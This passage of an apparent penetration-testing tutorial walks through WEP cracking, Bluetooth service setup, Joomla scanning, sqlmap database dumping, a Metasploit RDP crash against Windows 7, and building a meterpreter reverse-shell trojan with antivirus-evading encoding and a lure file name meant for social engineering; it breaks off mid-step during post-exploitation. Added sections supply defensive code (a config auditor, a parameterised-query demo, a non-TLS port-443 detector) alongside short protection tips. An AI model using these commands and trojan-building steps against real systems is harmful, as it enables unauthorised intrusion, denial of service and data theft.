    After this command the #Data counter in the airodump-ng window should start to climb steadily.

    Finally, to crack the wireless key we open a new terminal and start aircrack-ng with this command:

    aircrack-ng -b (BSSID) (filename-01.cap)

    Where: BSSID is the target BSSID, and filename-01.cap is the prefix you gave airodump-ng with -w, followed by -01.cap, the suffix of the first capture file.

    Aircrack-ng keeps re-reading the capture, so it picks up the IVs that airodump-ng captures and aireplay-ng generates while it runs.

    After a few minutes the WEP key should appear by itself if the attack works (see Figure 16).

    If no key appears, the usual causes are: the network's key was changed during the capture (you would know, since you are the AP owner); or the capture file is corrupted.

    How to protect against Wi-Fi penetration?

    To prevent this kind of attack, change your wireless encryption to WPA2. If this does not cause accessibility problems, also use a complex password (digits, lowercase and uppercase letters, symbols) to increase the cracking effort.

    Bluetooth security

    There are various hacks and a lot of software already available on different websites that help hackers compromise cell phones and multimedia phones over Bluetooth. In practice, however, many manufacturers have closed these security vulnerabilities. In this article we outline only some Bluetooth hacking software and show how to set it up.

    The first time we set up our Bluetooth equipment, we open a terminal and type this command:

    hciconfig hci0 up

    Where: hci0 corresponds to your Bluetooth interface. Your adapter should now be up and working. To verify that everything is OK, run this command: hciconfig -a (see Figure 17).

    Now we want to scan for and fingerprint a Bluetooth device. Fingerprinting is the term we use for profiling a device, and for this BackTrack ships a collection of tools called BlueZ, the standard Bluetooth stack for Linux. In this part we use hcitool to scan for devices that are broadcasting. We scan with the following command (see Figure 18):

    Figure 17. hciconfig -a

    Figure 18. hcitool scan

    Figure 19. sdptool


    hcitool scan

    Stop scanning once your device shows up and note its MAC address. Now we use sdptool to browse the device for open channels; it tells us which services are available on which channels (see Figure 19).

    sdptool browse Mac_address

    Where: Mac_address is your mobile's MAC address.

    Next we open our HCI daemon configuration file (generally /etc/bluetooth/hcid.conf) and replace its contents with the lines of Listing 1.

    We restart the Bluetooth service with:

    bash /etc/rc.d/rc.bluetooth restart

    We can now set up our device nodes. The first one is RFCOMM0 on channel 3 (DUN, dial-up networking), the second is RFCOMM1 on channel 6 (FTP) and the third is RFCOMM2 on channel 7 (OBEX push):

    mknod -m 666 /dev/rfcomm0 c 216 3
    mknod -m 666 /dev/rfcomm1 c 216 6
    mknod -m 666 /dev/rfcomm2 c 216 7

    It is time to register the services with sdptool (see Figure 20):

    sdptool add --channel=3 DUN
    sdptool add --channel=7 OPUSH
    sdptool add --channel=6 FTP

    At this point we have scanned for Bluetooth broadcasts, identified the channels and services, and configured our adapter. Normally you are ready to attack your mobile. As we said earlier, in this article we do not present the attacks themselves because our device is not vulnerable. But if you would like to know more about them, you can search for the Bluebugger and Bluesnarfer attacks.
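Listing 1 turns auth and encrypt on, but it also keeps a factory-style passkey "1234" and leaves the adapter discoverable (iscan enable). As an added example, not part of the original article, here is a small Python audit of a configuration fragment written in the same flat `key value;` form as Listing 1. The sample text and the list of well-known default PINs are constructed for the example; the checks reflect what the settings mean for the HCI daemon (auth: remote devices must pair before connecting; encrypt: the link is encrypted; iscan: the adapter answers inquiries, i.e. is visible to a scan like the hcitool one above).

```python
import re

# Constructed hcid.conf-style fragment in the same shape as Listing 1
# (flat `key value;` statements; values are made up for this example).
SAMPLE_HCID_CONF = """
autoinit yes;
passkey "1234";
security auto;
name "bt1";
iscan enable; pscan enable;
lm accept,master;
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
"""

# One statement: a keyword, whitespace, an optionally quoted value, a semicolon.
_STATEMENT = re.compile(r'(\w+)\s+"?([^";]*?)"?\s*;')

# PINs that ship as defaults on many headsets and phones (constructed list).
WEAK_PASSKEYS = {"0000", "1234", "1111", "9999", "000000", "123456"}


def parse_hcid(text):
    """Return {keyword: value}; several statements may share one line."""
    return {m.group(1): m.group(2).strip() for m in _STATEMENT.finditer(text)}


def audit_hcid(settings):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    # auth: remote devices must pair (and so prove the PIN) before they may connect
    if settings.get("auth") != "enable":
        findings.append("auth is not enabled: unpaired devices can open connections")
    # encrypt: link-layer encryption for established connections
    if settings.get("encrypt") != "enable":
        findings.append("encrypt is not enabled: traffic crosses the link in clear")
    # passkey: the PIN offered during pairing; short or default PINs are guessable
    passkey = settings.get("passkey", "")
    if passkey in WEAK_PASSKEYS or len(passkey) < 6:
        findings.append(f"passkey {passkey!r} is a default or too short (use 6+ digits)")
    # iscan: inquiry scan answers discovery requests, so the adapter is visible
    if settings.get("iscan") == "enable":
        findings.append("iscan is enabled: adapter is discoverable; disable it outside pairing")
    return findings


if __name__ == "__main__":
    for finding in audit_hcid(parse_hcid(SAMPLE_HCID_CONF)):
        print("-", finding)
```

Run against the sample, the audit passes auth and encrypt but flags the passkey and the discoverable adapter; the same two lines are exactly what a phone's configuration should differ in once pairing is finished.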

    Listing 1. HCI daemon configuration file

    autoinit yes;
    passkey "1234";
    security auto;
    name "bt1";
    iscan enable;
    pscan enable;
    lm accept,master;
    lp rswitch,hold,sniff,park;
    auth enable;
    encrypt enable;

    Figure 20. sdptool

    Figure 21. CMS Vulnerability

    Prevent Website Attacks

    Scanning Joomla CMS with Joomscan

    Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and on intranets. The principle is simple: you download the archive from the official Joomla website http://www.joomla.org/ and, after the installation, your website is set up and you can start publishing content (follow the documentation to learn how to install Joomla: http://docs.joomla.org/).

    To show how important it is to keep a CMS up to date, we deliberately use an old version of Joomla (download Joomla_1.5.26). In this case we host an Apache server and MySQL using a LAMP stack (http://en.wikipedia.org/wiki/LAMP_(software_bundle)). Joomla is available on our local network at 192.168.1.3/joomscan/. On the other side we use the latest version of BackTrack, 5 R3, to scan Joomla 1.5.26 for vulnerabilities.

    Start BackTrack and open the joomscan tool (you will find it in the BackTrack menu; see Figure 21). To run the joomscan script, use this command (see Figure 22):

    ./joomscan.pl -u (String)

    Where: String corresponds to the URL of our Joomla website. In this example the website is at 192.168.1.3/joomscan/.

    After a few seconds we can see the Apache and Joomla versions detected by joomscan, together with all the website modules it found. As we can see, the version reported is not the one we installed: joomscan gives the range 1.5.12-1.5.14.

    The mismatch is explained by the technique joomscan uses to detect the version: it reads the header of an .ini file included in Joomla, and that header is not always kept up to date. However, the analysis can still help you understand security in the CMS world.

    After a few minutes joomscan has checked all the vulnerabilities it knows against your website and tells us whether our version is affected (see Figure 23).

    Now we can follow the 'Exploit' instruction to run an exploit against our Joomla website.

    If you would like to prevent attacks on your Joomla website, you can run ./joomscan.pl defense and follow the instructions to make your CMS more secure.

    How to protect against Joomla vulnerabilities?

    The best technique to prevent attacks on a CMS is to keep your version up to date and to run joomscan regularly, in particular whenever you install a new module.

    SQL injection with sqlmap

    SQL injection is a code injection technique that exploits a security vulnerability in an application's software. SQL injection is mostly known as an attack vector against websites, but it can be used to attack any type of SQL database.

    If you would like to know more about SQL injection, read this great website: http://www.unixwiz.net/techtips/sql-injection.html.

    Figure 22. Running Joomscan

    Figure 23. Vulnerability on Joomla


    sqlmap is an automatic SQL injection and database takeover tool, and it is included in the latest version of BackTrack. In this section we analyze a vulnerable PHP script: we use sqlmap against it and extract database information.

    Download the sample website http://www.mathieu-nayrolles.com/pentestmag/victim/sample-site.zip (index.php and db.sql); it is vulnerable to SQL injection.

    To install the sample we simply put index.php in our localhost web directory, open 192.168.1.3/phpmyadmin and create a new database named sql_injection. Then we import the db.sql file into that database.

    When everything is OK, we open a browser and verify that the site is up (see Figure 24):

    http://192.168.1.3/testsql/?&name=ben&password=azerty5

    Where: 192.168.1.3 corresponds to the Apache server IP address; /testsql corresponds to the path where we put the website (index.php); name=ben is the first GET argument used in the MySQL query and corresponds to the user name; password= is the second GET argument used in the MySQL query.

    Now we start sqlmap from the BackTrack menu (see Figure 25).

    Then we run the command pictured in Figure 26. After a few minutes, sqlmap reports that the parameter name is injectable and lists all the databases (see Figures 27 and 28).

    Now we can exploit the SQL injection. To do so, execute the following command (see Figure 29):

    python ./sqlmap.py -u "192.168.1.3/testsql/index.php?name=ben" -D sql_injection -T user --columns

    Where: -D sql_injection selects the database named sql_injection created in step 2; -T user selects the table user in the sql_injection database; --columns asks sqlmap to enumerate the columns of that table. sqlmap reveals 3 columns: id, name and password (see Figure 30). Now we run a dump to get the password that goes with a username (see Figures 31 and 32).

    How to protect against SQL injection?

    The best technique to prevent SQL injection is to protect your MySQL query with mysql_real_escape_string() (http://php.net/manual/en/function.mysql-real-escape-string.php) or to use the PDO library and its prepared statements (http://ca1.php.net/manual/en/class.pdo.php).
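The sample index.php itself is not reproduced on this page, but the flaw it demonstrates is the classic one: the values of name and password are pasted into the SQL text. As an added example that is not the article's own code, the Python below rebuilds the user table (id, name, password) that sqlmap enumerated above in an in-memory SQLite database with constructed rows, and puts a concatenated query next to its parameterised equivalent, which is what PDO prepared statements give you in PHP. mysql_real_escape_string() has no SQLite counterpart, so only the prepared-statement fix is shown; the row values and the tautology payload are constructed for the example.

```python
import sqlite3

# Constructed schema and rows in the shape sqlmap reported for the sample site:
# table `user` with columns id, name, password (the row values are made up).
SCHEMA = """
CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO user (name, password) VALUES ('ben', 'azerty5');
INSERT INTO user (name, password) VALUES ('alice', 'correct-horse');
"""


def open_db():
    """In-memory database loaded with the constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def login_vulnerable(con, name, password):
    """Mirrors the sample site's mistake: request values become part of the SQL text.

    Whatever the user typed is read by the SQL parser, so quotes and operators
    inside `name` or `password` change the meaning of the query.
    """
    sql = ("SELECT id, name FROM user WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchall()


def login_safe(con, name, password):
    """Parameterised query: the SQL text is fixed, the values travel separately.

    This is the sqlite3 equivalent of a PDO prepared statement with bound
    parameters; a quote inside `name` is just one more character of a string.
    """
    sql = "SELECT id, name FROM user WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchall()


def demo():
    """Send valid credentials and then a tautology payload through both versions."""
    con = open_db()
    tautology = "' OR '1'='1"
    return {
        "vulnerable_good_creds": login_vulnerable(con, "ben", "azerty5"),
        "safe_good_creds": login_safe(con, "ben", "azerty5"),
        "vulnerable_injected": login_vulnerable(con, tautology, tautology),
        "safe_injected": login_safe(con, tautology, tautology),
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key:24s} -> {rows}")
```

Both functions return the same row for the real credentials; with the payload, the concatenated version returns every user because the WHERE clause has become a tautology, while the parameterised version returns nothing because no user is literally named `' OR '1'='1`.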

    Figure 24. SQL Injection

    Figure 25. SQLMAP

    Figure 26. Run SQLMAP

    Figure 27. SQL vulnerabilities

    Figure 28. SQL vulnerabilities


    Vulnerability exploitation on Win7

    In this case study we will learn how to penetrate Microsoft Windows 7. Nowadays companies are still struggling to recognize the overwhelming benefits of Microsoft's latest release. Indeed, a worldwide migration means considerable direct investment, licences and long-term commitment. Considering these well-known facts, we base our experiments on Windows 7 instead of Windows 8.

    In order to perform this case study, we will use the Metasploit framework. Metasploit is the perfect toolkit for pentesting.

    What you will learn:

    How to use Nessus and Metasploit;
    How to exploit a DoS on Windows 7;
    How to create a Trojan for Windows 7.

    Now we focus on Nessus. It is a vulnerability scanner that lets you scan a network and discover flaws and misconfigurations in operating system services. Even if BackTrack provides some packages, you need to download the latest version of Nessus:

    In the terminal, write apt-get install nessus;

    Then you must activate your Nessus version by following this link: http://www.tenable.com/products/nessus/nessus-homefeed;

    You will receive your key by e-mail. Copy this key and write the command below: /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx, where xxxx represents the key. If everything is OK, you will see this message: 'Your activation code has been registered properly thank you';

    After that, you need to create a user for Nessus: /opt/nessus/sbin/nessus-adduser;

    Choose a login and password, and say yes when Nessus asks whether you want to create an 'admin' user (see Figure 33);

    Finally, start the Nessus daemon by entering /etc/init.d/nessusd start.

    Nessus also offers a GUI in the web browser. Run Firefox and go to https://localhost:8834/. The connection requires https because all communication is encrypted using SSL/TLS.

    Now everything is set up to have some pentest fun on Windows 7.

    Exploit 1: DoS on Windows 7

    For this first exploit, we want to create a denial of service on a remote host. A DoS happens when a malicious intruder wants to stop a specific process (or all processes) on a remote computer or server. This type of attack can target e-mail services or websites and is performed by flooding or by exploiting a flaw in a program or service. In our case, we will crash the remote computer by exploiting a flaw in the Remote Desktop Protocol. RDP is very useful for taking control of a user session remotely. For instance, an administrator can help a user solve a problem, or you can help your mother set up her new printer. By default RDP uses port 3389. Since we have a fresh Windows 7 installation, the first thing to do is to activate this service. This is very easy: click the Start button, right-click Computer, then Properties. In the left panel click Remote Settings and then select the radio button 'Allow connections from computers running any version of Remote Desktop'. This exploit does not work with the third option, because it uses Network Level Authentication (NLA), which is more secure than the second one.

    Figure 29. SQLMAP command sample

    Figure 30. SQL Map results

    Figure 31. SQLMAP dump command

    Figure 32. SQLMAP Dump results

    Figure 33. Run Nessus as Admin

    Before we start, let's take a look at our roadmap. First, we perform a kind of pre-attack by scanning our entire network to see which hosts are connected. Then we choose a target, find a flaw using Nessus, and finally crash the system using the Metasploit framework. Nmap is a tool designed to scan a range of addresses or a specific target. We want to discover whether there are any Windows machines on our network.

    To discover all the hosts on this network, type nmap -sP 192.168.1.0-255 (see Figure 34).

    The -sP parameter means that we only want to list live hosts (a ping scan).

    There are some hosts connected to the network, but no Windows 7. However, there are a few unknown hosts, so we can gather more information about them with nmap -O ip_address, where ip_address is the IP of the target to scan. Let's try nmap -O 192.168.1.119 (see Figure 35).

    The result indicates that a Windows 7 machine is online on the network! Moreover, nmap has detected some open ports.

    It is important to know whether there is a possible way to hack our Windows. Here comes Nessus.

    Once you are logged in, create a new scan (under the Scans tab, click the Add button).

    We name our scan Win7 Scan and set the policy to Internal Network Scan. In the Scan targets box you can choose a range of IP addresses (for example 192.168.0.0/24), but we want to target a specific host, so we use the one found by nmap: 192.168.1.119 (see Figure 36).

    Launch the scan. After a while, you will see the results (see Figure 37).

    According to the scan, there are two potential high-severity threats for our Windows. Let's go deeper. By clicking the first result (SVC Name msrdp on port 3389), you learn a lot about this vulnerability: a description, the solution to protect against it if the flaw is exploitable, and the Common Vulnerabilities and Exposures identifier (CVE).

    The Metasploit website provides a database of auxiliary and exploit modules (www.metasploit.com/modules/).

    By entering the right CVE (CVE-2012-0002 in our case) in the search field, we discover that there are exploits for this kind of vulnerability. By clicking the link 'MS12-020 Microsoft Remote Desktop', Metasploit gives you all the information needed to exploit this vulnerability (see Figure 38).

    Figure 34. nmap results

    Figure 35. nmap results

    Figure 36. Nessus GUI

    Figure 37. Nessus results

    Now it's time to attack our Windows. On BT5, the first thing to do is to launch msfconsole, a popular Metasploit interface. It provides an 'all-in-one console' and gives access to a wide range of options. Execute msfconsole; an msf prompt appears. Then we must select the right module. According to the Metasploit website, we will use ms12_020_maxchannelids (see Figure 39):

    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

    If you type show options, you will see all the settings the module needs to perform the attack. You need to set RHOST to the remote host, our Windows 7.

    Write set RHOST 192.168.1.119 in the console. The show options command confirms that the target is set correctly (see Figure 40).

    Everything we need for this penetration is in place, so the last thing to do is launch the exploit!

    In the BackTrack 5 terminal, just write exploit and watch the result on your Windows (see Figure 41)!

    As you can see, Windows has just crashed (see Figure 41)!

    BackTrack 5 shows us that the module has run successfully (192.168.1.119:3389 seems down) (see Figure 42)!

    When you want to discover flaws on a remote system, repeat these three steps; they are very efficient and pretty easy.

    Exploit 2: Creating a Trojan to get access to a remote computer

    The first exploit was fun, but now we want complete access to the remote host!

    In this scenario we will use social engineering to send a malicious program to a user running Windows 7.

    Here is the roadmap of our experiment: first, we use msfvenom to create the payload to send to the target. Second, we create a handler to wait for a possible response from our target. Finally, we perform some actions on the remote host.

    Step 1: Generating the payload

    We will use msfvenom, which combines msfpayload and msfencode. msfpayload is a tool specially designed to generate all the shellcode available in Metasploit; msfencode is a small tool that helps with encoding.

    We will use reflective DLL injection: it is a technique for loading a library into a host process, here with the library delivered over TCP. TCP belongs to the Internet protocol suite and provides a reliable, error-controlled connection between two hosts.

    Figure 38. Search for exploit

    Figure 39. Use auxiliary command

    Figure 40. Show option command

    Figure 41. Windows 7 Crash

    Figure 42. Module Execution complete

    In the BackTrack terminal, write msfvenom -p windows/meterpreter/reverse_tcp -o to view all the options you need to fill in to generate the Trojan (see Figure 43). You need to provide some information such as your local IP address (LHOST). If you can't remember it, type ifconfig in the terminal. In my case it is 192.168.1.132. We also change the listening port (LPORT) to 443, because a firewall or a router is more likely to let this kind of traffic through. To generate and output the malicious file, write this command:

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.132 LPORT=443 -f exe > hot_girls_screensaver.exe

    Here are some explanations:

    -e x86/shikata_ga_nai selects an encoder that performs permutations and substitutions over the payload's blocks in order to bypass a spam filter or an antivirus;

    -i 5 encodes the payload 5 times;

    -b '\x00' keeps this byte (NULL) out of the payload, to avoid a premature end of the code;

    -f exe means that the output format will be an executable file;

    hot_girls_screensaver.exe is the name of the output (we chose an attractive file name to get a better result; see Figure 44).

    Now, with this executable, you can gain access to a remote computer through a reverse connection!

    If you list the directory (ls), you will see our Trojan. Then you must get this exe onto your Windows 7. In real life, you would probably need some social engineering tricks to get a user to download your Trojan. But don't forget that this is illegal.

    Step 2: Waiting for remote execution of the payload

    In BT5 you must use the generic payload handler. This module lets you use all the features of a payload launched outside the framework.

    Write use exploit/multi/handler and, for our purpose, set a reverse_tcp payload. It is necessary to execute the commands below (see Figure 45):

    set payload windows/meterpreter/reverse_tcp
    show options

    As shown in the screenshot, we need to configure the local host and the local port:

    set LHOST 192.168.1.132
    set LPORT 443

    Then we can run the reverse handler by typing exploit (see Figure 46).

    Now Metasploit is waiting for an incoming connection from a potential victim. In real life you don't know when a user will execute the malicious file, so be patient!
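The handler listens on 443 precisely because an outbound connection to that port looks like HTTPS to a firewall. What gives a plaintext staged reverse_tcp session away on the wire is that it carries no TLS at all: a real HTTPS client opens with a TLS ClientHello, whereas (this is my assumption for the example, not something the article states) the reverse_tcp stager connects and then waits for the handler to push a length-prefixed stage, so the connecting side sends nothing first. As an added example that is not part of the original article, the Python below classifies port-443 flows by their first bytes from each side; all sample flows are constructed. The check says nothing about the reverse_https variants, which do speak TLS.

```python
# Constructed first bytes for several flows. Each entry is
# (source, destination port, first bytes the client sent, first bytes the server sent).
SAMPLE_FLOWS = [
    # A browser opening HTTPS: record type 0x16 (handshake), record version 3.1,
    # record length, then handshake type 0x01 (ClientHello) and client version 3.3.
    ("10.0.0.5", 443, bytes.fromhex("16 03 01 00 c8 01 00 00 c4 03 03"), b""),
    # Plain HTTP sent to port 443: not TLS at all.
    ("10.0.0.7", 443, b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n", b""),
    # Assumed shape of a staged reverse_tcp session: the connecting side is
    # silent and the handler sends a 4-byte stage length followed by the stage.
    ("10.0.0.9", 443, b"", bytes.fromhex("00 10 00 00") + b"\x4d\x5a" + b"\x00" * 6),
    # Ordinary HTTP on port 80 is out of scope for this check.
    ("10.0.0.5", 80, b"GET /index.html HTTP/1.1\r\n", b""),
]


def is_tls_client_hello(data):
    """True if data starts with a TLS handshake record whose first message is a ClientHello.

    Layout: [0] = 0x16 content type handshake, [1] = 0x03 and [2] <= 0x04 record
    version, [3..4] = record length, [5] = 0x01 handshake type ClientHello.
    """
    return (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] == 0x01)


def classify_flow(client_first, server_first):
    """Label a flow by who spoke first and whether the opening looked like TLS."""
    if is_tls_client_hello(client_first):
        return "tls"
    if not client_first and server_first:
        # The client waited for the server to talk: that is not how HTTPS starts.
        return "server-first"
    return "non-tls"


def suspicious_port443_sources(flows):
    """(source, reason) for every port-443 flow that did not begin with a ClientHello."""
    return [(src, classify_flow(c, s)) for src, port, c, s in flows
            if port == 443 and classify_flow(c, s) != "tls"]


if __name__ == "__main__":
    for src, reason in suspicious_port443_sources(SAMPLE_FLOWS):
        print(f"{src}: port 443 without TLS ({reason})")
```

On the sample, the browser flow is accepted, the plain-HTTP flow is reported as non-tls and the silent-client flow as server-first; the latter is the pattern worth an alert on an egress that is supposed to carry only HTTPS.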

    Figure 43. msfvenom command

    Figure 44. msfvenom results

    Figure 45. Payload configuration

    Figure 46. Executing the reverse handler

    Figure 47. Trojan execution results


    Step 3: Executing the Trojan

    It's time to double-click the exe file on our Windows 7 (see Figure 47).

    Once the remote user launches the payload, a meterpreter prompt appears; that means you have complete access to the remote host! Meterpreter provides some powerful tools for executing remote code.

    When you hit the key, all the actions you are able to perform are listed.

    First of all, we must know who is running our payload, so we enter the command sysinfo (see Figure 48).

    As we can see in the screenshot, all the information about the remote host is displayed!

    Let's go further and see how many processes are running on the remote host. Type ps (see Figure 49).

    You will see the entire process list. By now the user probably thinks that your screensaver doesn't work. If he is skilled, he will probably want to kill the Trojan's process. In order to stay connected, a smart thing to do is to migrate our meterpreter process to another one. We choose explorer.exe because it is a generic process managing the Windows GUI. To do this, locate the process identifier (PID) of explorer.exe and typ